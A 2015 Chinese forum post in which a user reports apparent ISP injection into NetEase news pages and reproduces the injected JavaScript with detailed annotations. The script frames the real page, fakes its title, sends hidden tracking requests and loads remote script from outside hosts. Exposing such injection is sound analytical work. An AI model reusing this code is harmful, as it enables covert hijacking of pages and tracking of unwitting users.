本帖最后由 hudba 于 2015-2-3 00:56 编辑
上网易看新闻,半天打不开,发现状态栏显示正在访问一个奇怪的域名。心里一惊,难道电脑中毒了?赶紧查看源代码,发现后面加了一段js,真正的新闻内容被放进了iframe。
接下来就是去搜索这个域名,发现v2ex里面也有人遇到这个问题,原来是运营商搞的鬼{:soso_e131:}
https://www.google.com/search?q=info.hfjuki.com&ie=utf-8&oe=utf-8 http://www.v2ex.com/t/142197
顺便查下ip138:
这是那段js里面的代码,好像是个半成品,还没写入广告数据:
/**
 * Returns the query portion ("?" onward) of the injected script's own URL.
 *
 * The script element is located by getMainJs(); the result is everything from
 * the "?" that follows ".js" in its src. The injector therefore receives its
 * configuration through its own script URL, not through the page URL.
 *
 * NOTE(review): when no matching element is found a reload is requested, but
 * execution continues and the next statement dereferences null, so a
 * TypeError is thrown as well.
 *
 * @returns {string} The script URL's query string, including the leading "?".
 */
function locationSearch() {
  var mainScript = getMainJs();
  if (mainScript == null) {
    location.reload();
  }
  var scriptUrl = mainScript.src;
  // ".js?" is four characters long; +3 keeps the "?" at the head of the result.
  return scriptUrl.substring(scriptUrl.indexOf(".js?") + 3, scriptUrl.length);
}
/**
 * Extracts one named value from a "?a=1&b=2" style string.
 *
 * Only the text between the first and second "?" of paraStr is parsed. Values
 * are returned as found, with no URL decoding.
 *
 * Quirks worth knowing when reading captured traffic:
 *  - a missing parameter yields the literal string "No such parameter", which
 *    callers then store like any other value;
 *  - the "is there a following &" test starts at the first occurrence of the
 *    bare name, so a name that also appears inside an earlier key (for
 *    example "a" in "?ba=1&a=2") can yield an empty string.
 *
 * @param {string} name - Parameter name to look up.
 * @param {string} paraStr - String containing "?" followed by key=value pairs.
 * @returns {string} The value, "" in the quirk case above, or "No such parameter".
 */
function getParameter(name, paraStr) {
  var query = "&" + paraStr.split("?")[1];
  var marker = "&" + name + "=";
  var markerAt = query.indexOf(marker);
  if (markerAt == -1) {
    return "No such parameter";
  }

  var pair;
  var fromName = query.substring(query.indexOf(name), query.length);
  if (fromName.indexOf("&") != -1) {
    // fromMarker begins with the marker itself, so the pair runs from index 0
    // up to (not including) the next "&"; a missing "&" gives length 0.
    var fromMarker = query.substring(markerAt, query.length);
    var nextAmp = fromMarker.substring(1, fromMarker.length).indexOf("&");
    pair = fromMarker.substr(0, nextAmp + 1);
  } else {
    pair = query.substring(markerAt, query.length);
  }

  var value = pair.substring(pair.indexOf("=") + 1, pair.length);
  return value.replace("&", "");
}
/**
 * Locates the injected loader's own <script> element: the first script on the
 * page whose src contains the substring "t_c".
 *
 * The "t_c" marker is the string to search for in a captured page when
 * checking whether this injector is present.
 *
 * @returns {?HTMLScriptElement} The matching element, or null if none matches.
 */
function getMainJs() {
  var candidates = document.getElementsByTagName("script");
  for (var idx = 0; idx < candidates.length; idx++) {
    var tag = candidates[idx];
    // The comparison is against the *string* "undefined", so for element
    // objects it is effectively always true; the src test does the filtering.
    if (tag != "undefined" && tag.src.indexOf("t_c") != -1) {
      return tag;
    }
  }
  return null;
}
/**
 * Appends one "key=value" fragment to a URL string.
 *
 * "&" is used when the URL already contains a "?" at any position other than
 * index 0; otherwise "?" is used. Nothing is encoded. This helper is not
 * called anywhere else in the listing as posted.
 *
 * @param {string} oStr - URL to extend.
 * @param {string} aStr - Fragment to append.
 * @returns {string} The extended URL.
 */
function appendParam(oStr, aStr) {
  var joiner = oStr.indexOf('?') > 0 ? "&" : "?";
  return oStr + joiner + aStr;
}
// Replaces whatever window.onerror handler the host page may have installed
// with an empty function, so script errors raised after this point are no
// longer delivered to a page-level handler through this hook.
window.onerror = function () {};
// Number of title-sync retries scheduled so far (shared across calls).
var g_titleTime = 0;

/**
 * Copies the title of the document inside iframe "cn" onto the wrapper page,
 * then reveals the ad container through setTcAdvVisible().
 *
 * With the title mirrored, the tab looks like the page the user asked for
 * although the top-level document is the injected wrapper. While the framed
 * title is unavailable the function re-schedules itself once per second, at
 * most five times; the timer argument is a string evaluated as code.
 */
function setTcTitle() {
  if (undefined == document) {
    g_titleTime++;
    setTimeout("setTcTitle();", 1000);
    return;
  }

  var framedDoc;
  try {
    // document.all truthy: frames-collection lookup (presumably the old-IE
    // path); otherwise the standard contentDocument property.
    framedDoc = document.all
      ? document.frames["cn"].document
      : document.getElementById("cn").contentDocument;
  } catch (ex) {
    // Lookup failures are ignored; framedDoc stays undefined.
  }

  var titleReady = undefined != framedDoc && undefined != framedDoc.title
      && "" != framedDoc.title;

  if (!titleReady && g_titleTime < 5) {
    g_titleTime++;
    setTimeout("setTcTitle();", 1000);
    return;
  }
  if (titleReady) {
    document.title = framedDoc.title;
    setTcAdvVisible();
  }
}
// Starts the title-sync poll one second after this script runs. The callback
// is passed as a string, so it is evaluated as code in the global scope when
// the timer fires and relies on setTcTitle being a global function.
setTimeout("setTcTitle();", 1000);
// Set once the ad container has been revealed, so the reveal happens only once.
var g_isHaveVisible = false;

/**
 * Makes the element with id "addiv" visible (visibility and display), once.
 *
 * Nothing in this listing creates "addiv"; presumably it is supplied by the
 * wrapper page or by the remotely loaded ad script. Does nothing while the
 * element is absent or after the first successful reveal.
 */
function setTcAdvVisible() {
  if (undefined == document || g_isHaveVisible) {
    return;
  }
  var adBox = document.getElementById("addiv");
  if (undefined == adBox) {
    return;
  }
  adBox.style.visibility = 'visible';
  adBox.style.display = 'block';
  g_isHaveVisible = true;
}
/**
 * Holder for the parameters the injector reads from its own script URL.
 *
 * Four fields start as empty strings: divda, tctype, radius, rlu.
 * initParameters() later also sets address and usagent, which are not
 * initialised here.
 *
 * @constructor
 */
function UrlAnalyzer() {
  var fieldNames = ["divda", "tctype", "radius", "rlu"];
  for (var k = 0; k < fieldNames.length; k++) {
    this[fieldNames[k]] = "";
  }
}
/**
 * Fills this object's fields from the query string of the injected script's
 * own URL (see locationSearch()).
 *
 * Field -> URL parameter: rlu <- "lruedct", divda <- "divda",
 * radius <- "radius", tctype <- "tctype", address <- "address",
 * usagent <- "usagent". A parameter that is absent is stored as the literal
 * "No such parameter" returned by getParameter(). These parameter names are
 * useful search strings when reviewing a captured page or proxy log.
 */
UrlAnalyzer.prototype.initParameters = function() {
  var query = locationSearch();
  // [field on this, parameter name in the script URL], in assignment order.
  var bindings = [
    ["rlu", "lruedct"],
    ["divda", "divda"],
    ["radius", "radius"],
    ["tctype", "tctype"],
    ["address", "address"],
    ["usagent", "usagent"]
  ];
  for (var k = 0; k < bindings.length; k++) {
    this[bindings[k][0]] = getParameter(bindings[k][1], query);
  }
};
/**
 * Returns the document loaded inside iframe "cn", or undefined when the
 * lookup throws.
 *
 * When document.all is truthy the frames collection is used (presumably the
 * old-IE path); otherwise the element's contentDocument. The posted sample
 * also carries a commented-out alternative using contentWindow.document.
 *
 * @returns {Document|null|undefined} The framed document, if reachable.
 */
UrlAnalyzer.prototype.getHtmlDoc = function() {
  try {
    return document.all
      ? document.frames["cn"].document
      : document.getElementById("cn").contentDocument;
  } catch (ex) {
    // Errors are swallowed on purpose; callers treat undefined as "not ready".
    return undefined;
  }
};
/**
 * Fallback used when the wrapper page still has an empty title: drops the
 * leftmost label of document.domain (e.g. "news.example.test" becomes
 * "example.test"), then retries copying the framed document's title and
 * revealing the ad container.
 *
 * NOTE(review): relaxing document.domain is presumably meant to let the
 * wrapper read a framed page served from a sibling host name that sets the
 * same value; the listing itself does not show the framed side.
 */
UrlAnalyzer.prototype.setDomain = function() {
  if (undefined == document.title || "" != document.title) {
    return;
  }

  var firstDot = document.domain.indexOf(".");
  if (-1 != firstDot) {
    document.domain = document.domain.substring(firstDot + 1,
        document.domain.length);
  }

  var framedDoc = this.getHtmlDoc();
  if (undefined != framedDoc && undefined != framedDoc.title && "" != framedDoc.title) {
    document.title = framedDoc.title;
    setTcAdvVisible();
  }
};
/**
 * Load handler for iframe "cn".
 *
 * If the framed document's title is readable it is copied onto the wrapper
 * page and the ad container is revealed. Otherwise, provided document.domain
 * is defined, setDomain() is scheduled one second later as a fallback. The
 * posted sample also contains a commented-out inline copy of setDomain()'s
 * body at this point.
 */
UrlAnalyzer.prototype.iframeCallback = function() {
  var framedDoc = this.getHtmlDoc();
  var titleReady = undefined != framedDoc && undefined != framedDoc.title
      && "" != framedDoc.title;

  if (titleReady) {
    document.title = framedDoc.title;
    setTcAdvVisible();
    return;
  }

  if (undefined != document.domain) {
    var self = this;
    setTimeout(function() {
      self.setDomain.call(self, null);
    }, 1000);
  }
};
/**
 * Writes the injector's two remote resources into the page and hooks the
 * load event of iframe "cn".
 *
 * 1. A hidden iframe pointing at a statistics URL on info.hfjuki.com:8060,
 *    carrying divda (as advId), radius (as rd), address and usagent.
 * 2. A script element loaded from c2.sxite.com:8060/center with advId,
 *    radius and a fixed area=1.
 *
 * Both URLs are plain http, and the parameter values are concatenated into
 * the markup without any encoding or escaping before document.write().
 *
 * NOTE(review): as captured in the forum post, the double quotes inside the
 * two HTML string literals are not escaped, so this listing does not parse as
 * shown; the backslashes were most likely lost when the code was pasted. The
 * text is kept exactly as posted.
 */
UrlAnalyzer.prototype.executeHtmlContext = function() {
  // "tctype" is filled from this.divda here, not from this.tctype.
  var staUrl = "http://info.hfjuki.com:8060/page/statistics?advId=" + this.divda
      + "&rd=" + this.radius + "&tctype=" + this.divda + "&address=" + this.address + "&usagent=" + this.usagent;

  // Hidden iframe: the statistics request is made without anything visible.
  var htmlStr = "<iframe src="" + staUrl
      + "" style="display:none"></iframe>";

  // Remote script: whatever that host returns runs in the wrapper page.
  var advUrl = htmlStr
      + "<script src="http://c2.sxite.com:8060/center?advId="
      + this.divda + "&radius=" + this.radius + "&area=1" + ""><\/script>";
  document.write(advUrl);

  // Run iframeCallback when the framed page finishes loading; attachEvent is
  // used when the element offers it, otherwise the onload property.
  var self = this;
  var iframe = document.getElementById("cn");
  if (iframe.attachEvent) {
    iframe.attachEvent("onload", function() {
      self.iframeCallback.call(self, null);
    });
  } else {
    iframe.onload = function() {
      self.iframeCallback.call(self, null);
    }
  }
}
/**
 * Entry sequence of the injector.
 *
 * Navigates iframe "cn" to the URL in its own src attribute, then reads the
 * parameters from the script URL and writes the statistics iframe and remote
 * ad script into the page. The order of the three steps is kept as in the
 * sample.
 */
UrlAnalyzer.prototype.executeMain = function() {
  var contentFrame = document.getElementById("cn");
  contentFrame.contentWindow.location.href = contentFrame.src;
  this.initParameters();
  this.executeHtmlContext();
};
// Runs the injector as soon as the script is evaluated. g_analyzer is a
// global, so it remains reachable from the page for the rest of its lifetime.
var g_analyzer = new UrlAnalyzer();
g_analyzer.executeMain();